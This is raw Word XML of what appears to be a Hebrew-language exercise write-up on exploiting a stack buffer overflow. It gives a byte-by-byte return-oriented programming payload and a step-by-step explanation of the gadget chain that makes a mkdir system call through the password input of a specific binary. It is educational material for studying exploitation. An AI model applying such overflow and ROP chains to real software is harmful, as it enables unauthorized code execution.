    <w:p w14:paraId="0752C48C" w14:textId="335BE13A" w:rsidR="00376D44" w:rsidRDefault="00063B57" w:rsidP="0055366D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>my</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_first_expliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00417D9A">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00471711">
        <w:t>x0</w:t>
      </w:r>
      <w:r>
        <w:t>0\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B3380" w14:textId="6BE73A1D" w:rsidR="00376D44" w:rsidRDefault="00063B57" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00235D05">
        <w:t>2c</w:t>
      </w:r>
      <w:r w:rsidR="00780F50">
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00235D05">
        <w:t>0e</w:t>
      </w:r>
      <w:r w:rsidR="00780F50">
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD62A6" w14:textId="630730A7" w:rsidR="00112430" w:rsidRDefault="00112430" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B4244" w14:textId="4C0BE26C" w:rsidR="00376D44" w:rsidRDefault="00780F50" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="006E7468">
        <w:t>24\x06\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E87C29" w14:textId="62050232" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00CE327F">
        <w:t>2c</w:t>
      </w:r>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00CE327F">
        <w:t>0e</w:t>
      </w:r>
      <w:r>
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753227E1" w14:textId="369209A5" w:rsidR="00CE327F" w:rsidRDefault="00CE327F" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08864E" w14:textId="5355DFA2" w:rsidR="00B07266" w:rsidRDefault="00B07266" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x24\x06\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20712365" w14:textId="1CD58A2D" w:rsidR="00D73C81" w:rsidRDefault="00D73C81" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47229566" w14:textId="41062DE4" w:rsidR="004D7DCE" w:rsidRDefault="004D7DCE" w:rsidP="004D7DCE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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009B514B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r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  <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26CBDB5F" w14:textId="1D639EFB" w:rsidR="00CE4D60" w:rsidRDefault="00CE4D60" w:rsidP="00CE4D60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bc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x08\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6D10A" w14:textId="62DC9C36" w:rsidR="00CE4D60" w:rsidRDefault="00CE4D60" w:rsidP="00CE4D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74493D74" w14:textId="2EA42A6A" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44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</w:t>
      </w:r>
      <w:r w:rsidR="005E4D96">
        <w:t>ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x0</w:t>
      </w:r>
      <w:r w:rsidR="005E4D96">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBF188" w14:textId="4A153804" w:rsidR="005B5F12" w:rsidRDefault="005B5F12" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr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  <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="180EA7CB" w14:textId="5FA42764" w:rsidR="00060628" w:rsidRDefault="00060628" w:rsidP="00060628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x2c\x0e\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172C846" w14:textId="0586121D" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x53\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280508EC" w14:textId="7E9D89C7" w:rsidR="002B23E0" w:rsidRDefault="00D800EA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x4f\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BE7BA" w14:textId="4663DE39" w:rsidR="00376D44" w:rsidRDefault="00376D44" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B780A79" w14:textId="28DC5B33" w:rsidR="009E09C6" w:rsidRDefault="002F5B87" w:rsidP="002F5B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>רעיון:</w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נרצה לשנות את ערכי הפרמטרים המועברים לקריאת מערכת כך שהיא תיצור את התיקייה הרצויה. לשם כך נכניס את הערכים הבאים: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00575BEE">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="006763C6">
        <w:t>83</w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00575BEE">
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve"> = 0755, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00575BEE">
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidR="00F40055">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:t>adders on the stack of the new directory name</w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B75F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נעשה זאת בצעדים הבאים</w:t>
      </w:r>
      <w:r w:rsidR="007A40C8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בעת קריאת הסיסמה</w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E00C9" w14:textId="76847CD8" w:rsidR="000D00DC" w:rsidRDefault="00575BEE" w:rsidP="005A61AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הכנסת שם התיקייה החדשה על המחסנית </w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0066774E">
        <w:t>my_first_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0066774E">
        <w:t>\0</w:t>
      </w:r>
      <w:r w:rsidR="0066774E" w:rsidRPr="007F4CA9">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> + 7</w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> תווים כלשהם + הכתובת </w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, אליה נקפוץ אחרי קריאת הסיסמה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDCFF0" w14:textId="7A61CCEA" w:rsidR="000D00DC" w:rsidRDefault="000D00DC" w:rsidP="000D00D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הכנסת הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שיעלה לתו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בעת ביצוע </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pop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ומשם לקפוץ לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (שתוכנס לאחר הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> על המחסנית).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94BED6" w14:textId="4C54FE12" w:rsidR="005A61AF" w:rsidRDefault="009224D3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ב-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 הפעולות הבאות, נתייחס ל-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>push %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 xml:space="preserve"> אשר תשנה את </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D461C">
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הנוכחי ול-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>mov %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D461C">
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D461C">
        <w:t>, %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 xml:space="preserve"> אשר תעביר את </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D461C">
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D461C" w:rsidRPr="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>החדש</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בו שמורה </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כתובת </w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>המחזרות שאנו רוצים בתור שם התיקייה</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, ל-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D461C">
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CC3B8F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כמו כן, יכנס ב-</w:t>
      </w:r>
      <w:r w:rsidR="00CC3B8F">
        <w:t>call *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC3B8F">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC3B8F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ערך החזרה ממנו נרצה להיפטר.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B595226" w14:textId="3A5E6885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לאחר מכן, נקפוץ לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="00291794">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אשר תעביר את הערך הקודם של </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>r15-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> דרך </w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>pop r15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, ו</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">את הערך של </w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidR="00E35AEA">
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שנכנס ב-</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002161C2">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נכניס ל-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002161C2">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> דרך </w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002161C2">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002161C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ז נחזור שוב לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="00AB7B44">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79097DFC" w14:textId="727C213C" w:rsidR="00AB7B44" w:rsidRDefault="00AB7B44" w:rsidP="00AB7B44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היות הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אליה נעבור אחרי הקפיצה שתתבצע בכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בה נבצע את הפקודות הבאות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E9ED0" w14:textId="6C4C7C64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כאשר נעשה שוב </w:t>
      </w:r>
      <w:r>
        <w:t>push %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, הערך שיכנס הוא הכתובת של המחזרות הרצויה</w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ועוד 40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. משם נקפוץ שוב לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E81736">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שכבר מאותחל ב-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E81736">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E81736">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDE569" w14:textId="6FA6B959" w:rsidR="001D461C" w:rsidRDefault="001D461C" w:rsidP="001D461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נבצע </w:t>
      </w:r>
      <w:r>
        <w:t>pop %r</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובכך נ</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">קבל ב- </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="003E5385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הכתובת של המחזרות </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כמו כן, ב-</w:t>
      </w:r>
      <w:r w:rsidR="009011B3">
        <w:t>pop %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009011B3">
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009011B3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוציא את ערך של כתובת החזרה (שוב).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA8E8BC" w14:textId="0C568886" w:rsidR="008F66F3" w:rsidRDefault="001D461C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משם נקפוץ </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עם </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונכניס ב-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F66F3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את הערך </w:t>
      </w:r>
      <w:r w:rsidR="002B5C39">
        <w:t>=0xffffff</w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009B514B">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="002B5C39">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="007D7856">
        <w:t>0x4008bc</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
